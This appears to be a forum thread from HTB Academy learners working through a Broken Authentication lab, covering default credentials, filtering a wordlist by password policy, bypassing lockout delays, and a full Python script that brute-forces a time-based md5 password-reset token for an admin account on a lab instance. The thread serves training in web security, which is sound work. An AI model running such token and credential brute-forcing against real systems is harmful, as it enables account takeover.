BROKEN AUTHENTICATION module | HTB Academy

Hello everyone,

I am having the same problem as others before me:

  1. I am using the same script as posted before
  2. I create a token for htbuser and convert the given timestamp to epoch
  3. I also tried to take the timestamp and convert it to my time zone, then convert it to epoch
  4. Fed the timestamp to the script with a ±1000 ms range
  5. The script iterates 2000 times and each time creates an md5 hash of htbadmin+iteration#
  6. It sends the request and filters out all responses with the string “Wrong token”

but…

It does just that for 2000 times without returning any valid token. Nothing at all happens. So I am guessing that my mistake is at the beginning when I choose the timestamp to convert? I am using online websites or date -d ‘TIMESTAMP’ +%s for the conversion.

Can someone point me in the right direction?

Hello everyone,
Who passed the “Default Credentials” part?
Who can remember?
Is it really necessary to redo the entire script they propose to study in order to answer the question:
“Inspect the login page and perform a bruteforce attack. What is the valid username?”

I’m trying to feed my data from the provided machine into it.

The script freezes and has to be interrupted,
and the error that appears is always the same:

The task is to find a suitable list.
Have a look at the page title. Can you find a vendor there?
You have to bruteforce absolutely nothing.

Hmmm, so that’s how it is.
Then the HINT becomes logical.
I was confused by their question.
Why then do they ask for a “brute force attack”?

Inspect the login page and perform a bruteforce attack. What is the valid username?

Thank you for pointing my thinking in the right direction.

It’s still a bruteforce even with the right list?

No
You have to bruteforce absolutely nothing.
Find the right list of default passwords.

That’s still a bruteforce, unless you did it without using the script, but even entering them one by one is just manual bruteforce?

There are six entries on the list with four different user names.
You will be able to exclude two of them without further ado. So there are two possible answers left. If you start at the top, you won’t need a second try :wink:


Well, it appears I overcomplicated this by a factor of 1000. At least I learned how to process data and modify scripts, lol.

After PayloadBunny’s hint it became clear that it was not necessary to use the script and brute force, and I stupidly found the answer through Google, but that was no longer bruteforce, it was OSINT))
But the fact that the question itself confused me is 100% true)


Hello!
I got hung up on the task “Bruteforcing Passwords”.
It seems nothing complicated, just one question:

“Using rockyou-50.txt as password wordlist and htb user as the username, find the policy and filter out strings that don’t respect it. What is the valid password for the htb user account?”

I created my own table and defined a password policy.
I filtered out everything unnecessary.
The list even turned out to be small.
But the password that should be correct persistently does not fit in any way.
It is strangely simple; how did you solve this problem?

It worked!
Tell me, please, who is an expert on regular expressions?
Who can I write to personally for advice?
There are a couple of points that my grep filter has not mastered (
I had to filter out the extra passwords a little by hand.
Everything worked out, but I want to close this topic completely for myself.

Also, can anyone tell me which parameter in Burp Suite is responsible for the delay in the attack?
Bypass timing protection.
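The “filter rockyou-50.txt by the policy” step above is where grep usually trips people up: POSIX `grep -E` has no lookaheads, so an “at least one of each class” rule has to be chained as several greps (or run with `grep -P`). The following is an added example, not code from the module or from anyone in this thread. The policy it enforces (minimum 8 characters, at least one uppercase letter, one lowercase letter and one digit) is a hypothetical stand-in, because the module’s real policy is not stated on this page, and the wordlist is a small constructed sample rather than the real rockyou-50.txt.

```python
#!/usr/bin/python3
"""Filter a wordlist down to candidates that satisfy a password policy.

Added example for the "Bruteforcing Passwords" discussion; the policy below is
an assumption standing in for the module's real one.
"""
import re
import sys

# Hypothetical policy (assumption): >= 8 chars, one upper, one lower, one digit.
# Lookaheads express "at least one of each class" in a single regex.
POLICY = re.compile(r"^(?=.*[A-Z])(?=.*[a-z])(?=.*\d).{8,}$")

# The same filter with POSIX grep, which lacks lookaheads, is a chain of greps:
#   grep -E '^.{8,}$' rockyou-50.txt | grep '[A-Z]' | grep '[a-z]' | grep '[0-9]'
# or a single grep -P (PCRE) call using the regex above.

# Constructed sample wordlist (not the real rockyou-50.txt).
SAMPLE_WORDS = [
    "password",     # no uppercase, no digit
    "Password1",    # ok
    "Passw0rd!",    # ok (the policy does not forbid symbols)
    "12345678",     # digits only
    "Secret99",     # ok, exactly 8 chars
    "ab1",          # too short
    "Hunter2!x",    # ok
    "qwertyuiop",   # no uppercase, no digit
]


def filter_by_policy(words, policy=POLICY):
    """Return the words that match the policy, preserving wordlist order."""
    return [w for w in words if policy.match(w)]


def filter_file(path, policy=POLICY):
    """Read a wordlist file (one candidate per line) and apply the policy.

    Lines are stripped of the trailing newline only, so passwords with leading
    or trailing spaces survive the filter unchanged.
    """
    with open(path, encoding="utf-8", errors="replace") as fh:
        return filter_by_policy((line.rstrip("\n") for line in fh), policy)


if __name__ == "__main__":
    # Usage: python3 policy_filter.py [rockyou-50.txt]
    # With no argument the constructed sample is filtered instead.
    kept = filter_file(sys.argv[1]) if len(sys.argv) > 1 else filter_by_policy(SAMPLE_WORDS)
    print("\n".join(kept))
```

Pipe the output into the module’s brute-force script (or Burp Intruder) instead of the raw wordlist; with the constructed sample the filter keeps four of the eight candidates.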

Error Handling?

Hi, I am on the skills assessment and am quite stuck from the start… I am attempting to brute force the support login, with a 30 sec delay between each request to prevent the lockout, and trying to decode the cookie, but I am stuck on that as well. Any hints? Happy to talk over DMs or Discord. Thanks!

Did you find the solution to this problem?


Hi, I’m stuck with the first question in the course, about default credentials.

I have modified the given script so that it takes in a CSV file fine, and I have used all combinations from all the technologies listed here: https://github.com/scadastrangelove/SCADAPASS/blob/master/scadapass.csv. I also believe that row 12 relates to the technology here.

Where the question says, “Inspect the login page and perform a bruteforce attack. What is the valid username?”, I’m taking the question to actually mean: do a bruteforce by hand, just trying a small set of credentials from the link above to deduce the username only (the password is not even relevant).

Based on row 12 of the CSV in the link above, this looks pretty simple, but it doesn’t work. :confused:

Presupposing I understand all of this correctly, would someone be so kind as to tell me what I am missing, please? …and put me out of my misery.

Warm regards :slight_smile:

I got it!


I am stuck at this, need help.


About the Reset Token:
It took me 2 days to get all the details right!
How I solved it:
– The token formation scheme is indeed the same as in the CVE
– Python script implementing threads (you will send a couple of thousand requests)
– “Epoch in milliseconds” is int(round(time.time() * 1000)) in Python
– Fire the first request (htbuser) to create the token, then fire the guesses for htbadmin in the script
– I used a wider interval, T-2000 to T+2000
Note: you won’t be able to match the htbuser token unless you know exactly the millisecond when it was created (and you don’t need it, don’t waste time on that).


It’s one of those assignments that takes a couple of tries.
I wasn’t sure how the PHP code in the module example was creating the hashes, so I went to an online PHP sandbox and experimented with a couple of lines of code to figure it out.
After having some ideas, I modified the module’s Python script to compute the hashes for the htbuser user and compared them with the one generated on the question page. Once I got a hit, it confirmed the way the hashes were being computed. I modified the script for the htbadmin user, got it running and pressed the button to generate the token again.
Then it was just a matter of waiting.


#!/usr/bin/python3
from hashlib import md5
import requests
from sys import exit

# Target URL: replace ip:port with the spawned instance
url = "http://ip:port/question1/"

# Epoch timestamps in milliseconds (convert the displayed time at https://www.epochconverter.com/)
now = 1703489410000
start_time = now - 2000  # -2 seconds
end_time = now + 2000    # +2 seconds
fail_text = "Wrong token"
username = "htbadmin"

# Loop from start_time to end_time inclusive. The + 1 is needed because range() stops one short of its end.
for x in range(start_time, end_time + 1):
    # The token is the md5 of username + epoch-in-milliseconds
    timestamp = str(x)
    md5_token = md5((username + timestamp).encode()).hexdigest()
    data = {
        "submit": "check",
        "token": md5_token
    }

    print("checking {} {}".format(timestamp, md5_token))

    # Send the request
    res = requests.post(url, data=data)

    # Response text check: anything other than the failure string is a hit
    if fail_text not in res.text:
        print(res.text)
        print("[*] Congratulations! raw reply printed before")
        exit()

Timestamp in milliseconds converted from https://www.epochconverter.com/
python reset_token-time.py
Wait for execution, 4-8 minutes